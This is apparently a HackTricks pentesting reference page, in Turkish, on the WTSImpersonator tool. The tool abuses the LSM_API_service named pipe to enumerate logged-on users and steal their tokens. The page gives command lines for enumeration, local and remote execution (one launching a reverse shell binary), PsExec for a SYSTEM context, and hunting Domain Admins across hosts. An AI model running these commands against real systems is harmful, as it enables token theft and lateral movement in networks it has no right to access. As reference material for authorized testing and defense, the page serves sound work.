HackTricks

WTS Impersonator aracı, "\pipe\LSM_API_service" RPC İsimli borusunu kullanarak, oturum açmış kullanıcıları gizlice listeleyip, geleneksel Token Taklit yöntemlerini atlayarak onların token'larını ele geçirir. Bu yaklaşım, ağlar içinde sorunsuz yan hareketler sağlamaktadır. Bu tekniğin yeniliği Omri Baso'ya atfedilmektedir; çalışmaları GitHub üzerinde mevcuttur.

Temel İşlevsellik

Araç, bir dizi API çağrısı aracılığıyla çalışır:

WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW

Ana Modüller ve Kullanım

• Kullanıcıları Listeleme: Araç ile yerel ve uzaktan kullanıcı listeleme mümkündür, her iki senaryo için de komutlar kullanılır:

• Yerel:

.\WTSImpersonator.exe -m enum

• Uzaktan, bir IP adresi veya ana bilgisayar adı belirterek:

.\WTSImpersonator.exe -m enum -s 192.168.40.131

• Komutları Çalıştırma: exec ve exec-remote modülleri çalışmak için bir Hizmet bağlamına ihtiyaç duyar. Yerel yürütme, yalnızca WTSImpersonator çalıştırılabilir dosyasını ve bir komutu gerektirir:

• Yerel komut yürütme örneği:

.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe

• PsExec64.exe, bir hizmet bağlamı elde etmek için kullanılabilir:

.\PsExec64.exe -accepteula -s cmd.exe

• Uzaktan Komut Yürütme: PsExec.exe'ye benzer şekilde uzaktan bir hizmet oluşturmayı ve yüklemeyi içerir, uygun izinlerle yürütmeye olanak tanır.

• Uzaktan yürütme örneği:

.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2

• Kullanıcı Avlama Modülü: Birden fazla makinede belirli kullanıcıları hedef alır, onların kimlik bilgileri altında kod çalıştırır. Bu, birden fazla sistemde yerel yönetici haklarına sahip Alan Yöneticilerini hedef almak için özellikle faydalıdır.
• Kullanım örneği:

.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe